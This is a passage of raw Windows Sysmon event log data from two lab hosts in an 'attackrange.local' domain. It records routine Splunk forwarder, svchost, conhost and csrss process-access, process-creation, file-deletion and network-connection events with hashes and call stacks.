Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A9CDD822FE80FCBFD33555CA365A58B,SHA256=A1F194453D83DED957907A69238E81AF515833A1AB998BD8C67D7898C4CDF3CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246181Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5258-6063-BF22-00000000AF01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246180Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246179Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246178Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246177Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246176Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246175Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246174Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246173Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246172Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246171Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-5258-6063-BF22-00000000AF01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246170Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5258-6063-BF22-00000000AF01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246169Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.956{CB4067E1-5258-6063-BF22-00000000AF01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246168Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.377{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7E32C098A94E634D1E4790B20A8F431,SHA256=C6257A258B8E0B15554461519E8680415B8184649837EDC592BC8343B1A66168,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246167Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.224{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DAACB30B50E1C6641DB8F5488F64348,SHA256=66C93805F95D833A267F7ACD6DA049CDAC66B73F8DDA2BF5EA9EF370DAFE116D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246166Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:20.224{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21E3072B6863A297B590ACC9205862BE,SHA256=556BDA5766AF59C86121AE35A0B9248ECC0372457600501C1161A202CB5DAA21,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061446Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:18.035{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54834-false10.0.1.12-8000- 23542300x80000000000000001061445Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.747{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C84BECA3DBF681B1FADEF03EFB51BEF9,SHA256=29B0E61E2538E0F82C616FD2A8A0D5A77C5D3B171D9DE4B92DB64DB5D6EC5D69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061444Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.747{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5259-6063-3001-00000000AF01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061443Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.747{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061442Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.747{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061441Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.747{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061440Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.747{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061439Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.747{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-5259-6063-3001-00000000AF01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061438Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.747{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5259-6063-3001-00000000AF01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061437Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.749{7F8C56E7-5259-6063-3001-00000000AF01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001061436Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.060{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5259-6063-2F01-00000000AF01}1092C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061435Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.060{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061434Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:21.060{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061433Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 